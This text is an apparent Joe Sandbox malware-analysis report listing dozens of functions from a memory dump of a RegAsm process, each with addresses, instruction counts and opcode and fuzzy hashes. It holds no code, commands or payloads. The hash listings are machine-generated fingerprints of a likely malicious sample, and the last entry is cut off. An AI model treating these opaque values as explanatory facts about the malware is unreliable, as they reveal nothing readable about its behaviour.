                                                    • Instruction ID: 2efa0f38491e8da965a8083d1c7b4da0ebd25de13f147263b7d86af059de8ff4
                                                    • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                    • Instruction Fuzzy Hash: F0F0E936B419124FDF77EA29E820B2EB2569F80BC4B15052C9743CB650DF10D800DBA1
                                                    Function 02F392FF Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44ebf7da21dc49d23cbdee7f0fcd170aa3bdda1213dbfef8edc029c98e280ee4
                                                    • Instruction ID: 95960308894191497380bdf0523f1a1304058a0aa20fab8b5a623ce962c1af7f
                                                    • Opcode Fuzzy Hash: 44ebf7da21dc49d23cbdee7f0fcd170aa3bdda1213dbfef8edc029c98e280ee4
                                                    • Instruction Fuzzy Hash: 14F09072100644ABD732AB59DD04F9ABBEDEF84790F180559AA4693190D7E1A905CB50
                                                    Function 02FFF3E6 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 208614e126628801b6df78e3acd86d01495e27d530a8051ad797654a5f7f246e
                                                    • Instruction ID: 3613661d0c169592ed15566a58a3801b77dea4953a958e9ae991f93a0f0d7bd3
                                                    • Opcode Fuzzy Hash: 208614e126628801b6df78e3acd86d01495e27d530a8051ad797654a5f7f246e
                                                    • Instruction Fuzzy Hash: 45F08C71E00208AFCB04EFA8D905A9EB7F4EF08344F404069BA05EB391E674EA00CB54
                                                    Function 02FFF6C7 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a472c634bd07fcca39ce96b91f52cfd1c22c345797a602aab6745ae99b68cd52
                                                    • Instruction ID: 570b3e5af62cd88b07b65288304e97a07331e8adfd390f33dfc8eb928588ec60
                                                    • Opcode Fuzzy Hash: a472c634bd07fcca39ce96b91f52cfd1c22c345797a602aab6745ae99b68cd52
                                                    • Instruction Fuzzy Hash: E1F06271A1024CEBCB04EFA9D805E9EB7F4AF04744F004059F601EB391E774D900CB54
                                                    Function 02F447FB Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d33496cae2914b5065a8916c370040c0eef32e06c76340f7e7369accefe7b5d
                                                    • Instruction ID: ff4593df9a5f64f6206a3cea1f367091349348892bbf3b0ee71e45e671863ad2
                                                    • Opcode Fuzzy Hash: 3d33496cae2914b5065a8916c370040c0eef32e06c76340f7e7369accefe7b5d
                                                    • Instruction Fuzzy Hash: 61F09031D126E09FE731CB58C544F62BFD49B006E4F0C496AD799A7911CBA5D880C650
                                                    Function 03000115 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f29ecacad4ab68397680256e031fdd8772b054bdf85ed77ce21e4340cdb2b1d
                                                    • Instruction ID: a5513395b6de291d9cb91af744b298e2d4e9ed152b9df2b3b937e5f601c77dd2
                                                    • Opcode Fuzzy Hash: 5f29ecacad4ab68397680256e031fdd8772b054bdf85ed77ce21e4340cdb2b1d
                                                    • Instruction Fuzzy Hash: 18F02E2641B68416DB61AB2CF8D03D17BEE9742224F0E14C6C56557144C6794443C610
                                                    Function 0301539D Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 569f2858ecb0c77ebdff09d1eb7520ae754bd9c20694c9adc1bda070d426080b
                                                    • Instruction ID: 554c96101fae8c46ee2bef1ea697a46be10044f643f93921b2e1161357930d6b
                                                    • Opcode Fuzzy Hash: 569f2858ecb0c77ebdff09d1eb7520ae754bd9c20694c9adc1bda070d426080b
                                                    • Instruction Fuzzy Hash: 4EF0B470A1024C9FC704EBB8D841E9DB7B8AF44744F508094E602EB280DA74D9018B14
                                                    Function 03015283 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d266be76d5d5ccbb83329a88e7a75b6386e77c8fd20a40729ad22e146b70a8dd
                                                    • Instruction ID: a67ff93ebdfc91e345139c9928c3c19679c96144e131b62cf59729c9eae843bf
                                                    • Opcode Fuzzy Hash: d266be76d5d5ccbb83329a88e7a75b6386e77c8fd20a40729ad22e146b70a8dd
                                                    • Instruction Fuzzy Hash: 60F0BE70A11208ABCB04EBA8D901EAEB3F8AF45744F004498FA01EB281EA34E9008B54
                                                    Function 030152E2 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 18bb6573b9b72bd32c9a8d333f4f7cfb300f3438f4b71a4935cb2a461f113d99
                                                    • Instruction ID: ee63c41dd364f89bf006e1e1d1606f49eed5becdd17ab00b044edc981396479f
                                                    • Opcode Fuzzy Hash: 18bb6573b9b72bd32c9a8d333f4f7cfb300f3438f4b71a4935cb2a461f113d99
                                                    • Instruction Fuzzy Hash: 45F0E970A1024C9FC704EFB9D941E6EB3F8EF44744F044458B601EB280EA74D900CB14
                                                    Function 02F82619 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                    • Instruction ID: c7af53db9fe81faa1459f58ee3944d92af509bc77587f79d2feb6284eb2f5e37
                                                    • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                    • Instruction Fuzzy Hash: 50E0D8723006402BD712AE59CCC0F57B76FEFC2B50F040079BB045F251CAE2EC098AA4
                                                    Function 03015341 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d504f74a88026d611036a1ce1c389d8f9e041e2b22bdf30afc23ea87d8c748cf
                                                    • Instruction ID: ac4be513dcd291986dc8931c2ce2547a83577c1bbf5430ad89ede925cbf1b760
                                                    • Opcode Fuzzy Hash: d504f74a88026d611036a1ce1c389d8f9e041e2b22bdf30afc23ea87d8c748cf
                                                    • Instruction Fuzzy Hash: C5F0AE709012499BCB04EBB9DD45D9DB7F8DF49744F540455F602EB2D0EA74D9008718
                                                    Function 02F77208 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1d7bc2c142768f81a4e83d62fc8035dca0beb8663e79cdc59fea20c2a8b4695
                                                    • Instruction ID: a959e699c5c981b7f8be8c81b6167e40f853f1a45a2360d96b22a96fe1bf87d8
                                                    • Opcode Fuzzy Hash: e1d7bc2c142768f81a4e83d62fc8035dca0beb8663e79cdc59fea20c2a8b4695
                                                    • Instruction Fuzzy Hash: 9DF0A072E21A949FD733D71EC694BA2B7E89F00BF4F0985A1DA198B712C738DC80C650
                                                    Function 03015227 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe382e4783c42eec77fa9e235a82d3ccc015cc0eaf36d27e5eb605e77fabba90
                                                    • Instruction ID: 8d8f8a835e5a9343b32991ed0431f1d0d662d30973f0f323a66c9a3f592c32a9
                                                    • Opcode Fuzzy Hash: fe382e4783c42eec77fa9e235a82d3ccc015cc0eaf36d27e5eb605e77fabba90
                                                    • Instruction Fuzzy Hash: 76F08271A15259ABDB04EBA8D905EAEB3B8AF45744F140498FA02EB291EA74D9008B58
                                                    Function 02FBD070 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                    • Instruction ID: ee471ce852f04f96c20c365a26361dd3aed76fc04b149ba33e6fe25a1a400569
                                                    • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                    • Instruction Fuzzy Hash: 43F0E53350565467C231AA1D8C05F9BFBACDBD5BB0F10036ABB249B1D0DA70A901CBD6
                                                    Function 030151CB Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 22c35577858bd02834a1ce745da2883806ade899fdaaced6842f87a56e0930b6
                                                    • Instruction ID: d4980b9426c54e5123c60a1fb5c7b3125bc6b4330418607fa44c510146d82a61
                                                    • Opcode Fuzzy Hash: 22c35577858bd02834a1ce745da2883806ade899fdaaced6842f87a56e0930b6
                                                    • Instruction Fuzzy Hash: FBF08971A1125D9BDB04EBA8D905E5EB3B8AF45744F140455FA01DB2D0EA74D900CB54
                                                    Function 030137B6 Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                    • Instruction ID: dda28acb4c2a39324b99365a5d7ee352ea2011a3fb57ee6651a93516886e4e85
                                                    • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                    • Instruction Fuzzy Hash: 8DE06D72211210AFE764EB58DD05FA6B3ECEB00760F140298B625930D0DAB0BE40CB60
                                                    Function 02FC4000 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                    • Instruction ID: 68be082568a782f65d95a59df461275928c191eb94ea27c049e64fd814aab313
                                                    • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                    • Instruction Fuzzy Hash: 80E0C2347803068FD715CF19C150B627BB6BFD5A64F28C068A9488F205EB32E842CB40
                                                    Function 02F3823B Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                    • Instruction ID: 4d032d29bbbaca1ad34e9ba0468345c28be2b7dbc1c828d7aaaf62e3578a3e09
                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                    • Instruction Fuzzy Hash: 36E08C32501A60EFDB322E25EC00B51B6E2FB44BD0F214829F781070A487B8AC81CF44
                                                    Function 02FFB3D0 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                    • Instruction ID: eecb8980677c2d77240ed20d3634307ed4ecda808cd442f82124e4ec46a9729d
                                                    • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                    • Instruction Fuzzy Hash: CEE0C232284214BBDB222E54CD00F697B56DF547E4F104032FB08AA6A0C671AC91DAD4
                                                    Function 02FC92BC Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee2b33b08eebb136fd4f92977c930cd7e19df8569f3e157e452e3bbba62b82e0
                                                    • Instruction ID: 13c36f284425bdbd1c4437499132c4740604ac779ae8d0f814f6652edd4db46b
                                                    • Opcode Fuzzy Hash: ee2b33b08eebb136fd4f92977c930cd7e19df8569f3e157e452e3bbba62b82e0
                                                    • Instruction Fuzzy Hash: BFF0ED35651B80CFE71ADF04C2E1B6173BDF745B44F50049CD8864BBA5C73A9941CA40
                                                    Function 02F42050 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4aa8980302f3429eca4996bfb0dbf7b7fe7dbc21e84d31aadc4b9de2561ae63
                                                    • Instruction ID: 661d90247bd69f8760d85616bf114fa1aa93c6740fd24d303805994cd91437b5
                                                    • Opcode Fuzzy Hash: b4aa8980302f3429eca4996bfb0dbf7b7fe7dbc21e84d31aadc4b9de2561ae63
                                                    • Instruction Fuzzy Hash: F5E08C321004646BC212FA5DED50F4A779EEF943E0F000121B65097290CA64AC40CBA4
                                                    Function 02F3A0E3 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                    • Instruction ID: 3143031fe346a3c00aed1304fd19d1153a044faf2fbb23b91b9cee87c9460fd4
                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                    • Instruction Fuzzy Hash: 8ED0223331603093CB2AA6666C04F637A069B80AD4F0A006C3A0A93800C1148C82CAE0
                                                    Function 02F502A0 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                    • Instruction ID: dfe8613e678ae64d95b22812449bb5ff77f0c721ac9f22a5ad86551324bac722
                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                    • Instruction Fuzzy Hash: 0AD0C935712E90CFC72BCB0CC5A4B2573A4BB48B84F8104A4EA01CBB22DB6CD940CA00
                                                    Function 02FC930B Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                    • Instruction ID: 0a5b2ed0642e8b573b1a4d027f90406e02bc40dd0f0dc3855e3b7989b5d761d9
                                                    • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                    • Instruction Fuzzy Hash: 0BD05E35941AC4CFE727CB08C265B607BF8F705B80F95009CE04247BA2C3BC9984CB00
                                                    Function 02F60310 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                    • Instruction ID: 47abbfd056b7848f7005cce6fe7b79f55b0d6ddf07d7fbaf2d7348770dfd0f65
                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                    • Instruction Fuzzy Hash: 48D01236100288EFCB05DF41C890DAA772BFBC8750F148019FD19076108A31ED62DA50
                                                    Function 02F40750 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                    • Instruction ID: fb997f2292e32a4c63b254b77546e6c083064a5fdfd1e042ac0aa76ff95f6773
                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                    • Instruction Fuzzy Hash: 7DC04879B01A458FDF16DB2AD694F4977F4FB44780F1508D0FA46CBB21E724E801CA10
                                                    Function 02F84340 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53ef36f3eef23330da26bcb5b0e85a288824c55a6c56b44fec0dabef4b27a982
                                                    • Instruction ID: 56bcd7924ae982e8643ff4ec87cb32f6f0c70b3d2ae8a4dc90e08c1565d0de90
                                                    • Opcode Fuzzy Hash: 53ef36f3eef23330da26bcb5b0e85a288824c55a6c56b44fec0dabef4b27a982
                                                    • Instruction Fuzzy Hash: 5290023160580022A54071588884547400597E1381B55C011E1428554C8A148A565365
                                                    Function 02F83090 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: defc62f9c9af0c5a5913776c5646c26e502f0ed4eda5c9818c71dc0a9db9204b
                                                    • Instruction ID: bba43ff148f433b7eddad20e981151da492f13ccf6bca565de30486b8a9fbd48
                                                    • Opcode Fuzzy Hash: defc62f9c9af0c5a5913776c5646c26e502f0ed4eda5c9818c71dc0a9db9204b
                                                    • Instruction Fuzzy Hash: 1990023124140812E5407158C4147070006C7D1681F55C011A1028554D86168A6566B5
                                                    Function 02F83010 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 06303e0cf1ea9c4e0e4daed588029817b8f5086da7f9fba892136691c16aadd5
                                                    • Instruction ID: eff133ef4e0c7d03c55e16be488c0e81abcd4fd34f404a8db81f06b0ca7e7f7f
                                                    • Opcode Fuzzy Hash: 06303e0cf1ea9c4e0e4daed588029817b8f5086da7f9fba892136691c16aadd5
                                                    • Instruction Fuzzy Hash: 4A90023120184452E54072588804B0F410587E2282F95C019A515A554CC91589555725
                                                    Function 02F84650 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c196f4e2247d69f1e5541cd04e0d608c842158411edee68835537d3400a77d4e
                                                    • Instruction ID: 62a95abb00f65d9cfdcfa30bcaa7427fa2b76cb5a1b5b910a9ce6853176f6e22
                                                    • Opcode Fuzzy Hash: c196f4e2247d69f1e5541cd04e0d608c842158411edee68835537d3400a77d4e
                                                    • Instruction Fuzzy Hash: 1590027160150052554071588804407600597E2381395C115A1558560C86188955926D
                                                    Function 02F82AF0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2236f30c62c5c342c3e190f95b8ba1c2ba3bc47b04383808c86aa9e7c46237c
                                                    • Instruction ID: 8fa30d3635d2e60158ec2115d03f3b5beea6ccb789a12e0fe90220b6b805938f
                                                    • Opcode Fuzzy Hash: a2236f30c62c5c342c3e190f95b8ba1c2ba3bc47b04383808c86aa9e7c46237c
                                                    • Instruction Fuzzy Hash: C7900235221400121545B558460450B044597D73D1395C015F241A590CC62189655325
                                                    Function 02F82AD0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f6c28a91dad61b3496426aa5c80f94db943b773760cf8f8764e7ba4936dafbc2
                                                    • Instruction ID: a52c38fa43081937a0200087410daa295c704cb91e1ef2e3b412bafc2bbf7931
                                                    • Opcode Fuzzy Hash: f6c28a91dad61b3496426aa5c80f94db943b773760cf8f8764e7ba4936dafbc2
                                                    • Instruction Fuzzy Hash: 07900435311400131505F55C47045070047C7D73D1355C031F301D550CD731CD715135
                                                    Function 02F82AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7d1653bdd207e2e0ce89aa392f22a219867d461a1be98d0102e94e3f717beaf
                                                    • Instruction ID: 84dcb3423e5a04b19dcfaf1721a18f9c39e988588f3158c625e383a36a09dffc
                                                    • Opcode Fuzzy Hash: a7d1653bdd207e2e0ce89aa392f22a219867d461a1be98d0102e94e3f717beaf
